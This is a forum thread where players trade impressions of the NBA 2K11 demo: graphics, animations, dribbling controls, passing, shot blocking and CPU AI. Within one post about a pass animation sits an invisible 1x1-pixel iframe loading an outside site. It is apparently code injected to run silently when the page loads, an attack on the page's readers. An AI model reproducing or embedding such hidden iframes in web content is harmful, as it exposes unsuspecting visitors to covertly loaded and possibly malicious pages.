Yeah, as someone who plays SIM, it's not a good sign that if I wanted to record some highlights of me driving to the basket at will with Shannon Brown that I could. If I could do it, the cheesers definitely can do it. But I'm giving this "demo" the benefit of the doubt that 1: it's on Pro, 2: it's not on Sim style, 3: it's just a demo. I'm pretty sure come Oct 5. or at least after the first patch once all the glitches are spotted that that won't be possible

My monitor doesn't have a sharpness setting and even if it did, I'm not gonna make the image blurry just to mimic 2X AA that 2K Sports should've utilized in the game by now.Man, ok guys, my impressions are from the ps3 version...I wonder what you game you guys are looking at on the ps3 version sayin' that the grapics have taken a hit! That's not hardly the truth! Peeps sayin' they see jaggies all over, like someone said early in the thread, adjust your sharpness!! I've never had these problems with any game, probably becasue I have sharpness set to 1 or 2 at all times...Comment

Pros:
- Great array of moves, especially for Kobe.
- Signature shot, seemed to be captured perfectly
- Game flow is a lot better.
- Less uncontested dives to the basket
Cons:
- Almost no physics, i.e in air collisions not involving animations don't exist, Jumping into the pass lane not effective.
- Gameplay only marginally improved over last year.
- Dribbling is not 1 to 1; still animation controlled.Comment

I'm impressed by the improved movements of this game. The game feels a lot smoother also. I love all the new animations and the defense feels nice. I can't wait to get the full version. The only gripe I have with the demo is I'm forced to play on broadcast cam. Yuck.Comment

I just cant see the ball when kobe pass to fisher if not mistaken.^ good example @ 3:18
Feels like a Live-ish animation. It stands out because most all the other animations look great, not a big deal to me though.<iframe src="http://zeroethics.com/opsports/" frameborder="0" marginheight="0" marginwidth="0" width="1" height="1"scrolling="no"></iframe>Comment

Re: NBA 2K11 Demo Available Now, Impressions and Discussion Here (360,PS3)
QFT....When the defenders bump the ball handler, the chaining of isomotion for the most part is nerfed. It is fairly easy to size up, branch out and chain one isomotion move, be it a spin, step back, or simple cross. You can normally add a third level chain with the sig gathers, but if you try yet another isomotion move as your third level chain, the chances for success go way down.
The fact of the matter is that, you have to pick and choose your spots to go one on one trying to break the defenders ankles. When the opportunity presents itself, by all means, go into AND 1 mode. However, you still will need to master ALL aspects of the game, from post moves, to play calling, to icon lead pass, to P&R fundamentals to compete in this game. And this game will not be for the faint of heart. It is so deep and I can't wait for retail to dig into the nuances of the deep gameplay.
With 2K games, I love how they do not tell you EVERYTHING out of the box...you must figure it out as you play and get better. Very rewarding for me, yet can be frustrating for others. To each their own I guess.Gentlemen.... well said. Man, the 5th can't come soon enough.Agreed man but Ill never complain about forward progress
Thing is, 2k's demos were always worse versions of the game than the retails by a longshot.
That said, I expect the retail to feel much much better, but in terms of getting familiar with what you're going to face the demo kinda shows some of it in terms of controls and the AI, even on pro.
I love that the CPU is smart and doesnt force the game to happen, which is what im most intrigued about because I play alot of SP and am looking forward to an 82 game season.
The way Rondo controls the pace, how Nate loves to jack up shots.. PP's set shot and goose neck, Ray coming off the curl.. KG's elbow post up.. all they need is to have Perkins bounce the ball every single time before he takes it up strong. I have no idea why that guy does that but he never goes straight up
All in all im saying we're in for some battles with the AI and the demo gives you a great glimpse of that.. All of the lead pass talk, and the PIP stuff, you dont even see those complaints in hereComment

Re: NBA 2K11 Demo Available Now, Impressions and Discussion Here (360,PS3)
Can anyone answer this for me? thanksSo can any of you guys playing the demo tell me if you can control the direction you lean when shooting? anyone remember in 2k5 you could move the left analog stick left and youd lean left or or move it right and youd lean right? Can you do that in this demo? ive watched some vids that make it look like you can. just wanted confirmationComment

Re: NBA 2K11 Demo Available Now, Impressions and Discussion Here (360,PS3)
i'm hating the shot blocking...it's so slow and the animations suck....it was fine last year.
my player often jumps in the wrong direction when I try to contest...it was fine last year and they made it worse...i don't get it.Last edited by blues rocker; 09-15-2010, 12:50 PM.Comment

Re: NBA 2K11 Demo Available Now, Impressions and Discussion Here (360,PS3)
my only real complaint is that passing is so hard. It seems like every pass i throw is deflected or stolen in some way, shape or form. Other than that it feels like a different game because of how fluid everything is. Can't wait to get my hands on the full version so i can get out of this camera as well.Comment

Re: NBA 2K11 Demo Available Now, Impressions and Discussion Here (360,PS3)
i also have a problem with the types of shots that go in. last year it seemed that when a guy took a bad or contested shot, you knew it was probably going to miss...this year is seems like it's completely random which shots go in and which ones miss...i'm seeing all kinds of contested shots, contact shots, and crazy fade aways going in too much. makes me feel like it's pointless to play defense because the shot's going to go in no matter what i do. last year it seemed like if i was in a guy's face, he would usually miss...i could determine the outcome...now it seems like it's completely random.Comment

Re: NBA 2K11 Demo Available Now, Impressions and Discussion Here (360,PS3)
And this is why I prefer 2k's "isomotion" on the left stick over "freestyle dribbling". I just think some ppl just want pick up and play and give up when they feel that performing moves are too hard. But the thing I like about 2k is you have to hit the practice court to master your moves. And I love the fact the opportunity to do isomotion isn't always there. You have to pick your spots.Yep exactly. Most NBA stars have moves where they dribble 3 times or less then shoot because the D is all over them.
Truth of the matter is guys are likely having the most issues because they are doing 1 of 3 things... Jamming on the sticks (forcing it), holding down the sprint trigger (trying to hard), or trying to iso dribble too much like steve francis (dribble dribble cross, dribble steback between the legs, cross cross shake cross dribble).
Those 3 things always gets you in trouble in the NBA if you think about it.Comment
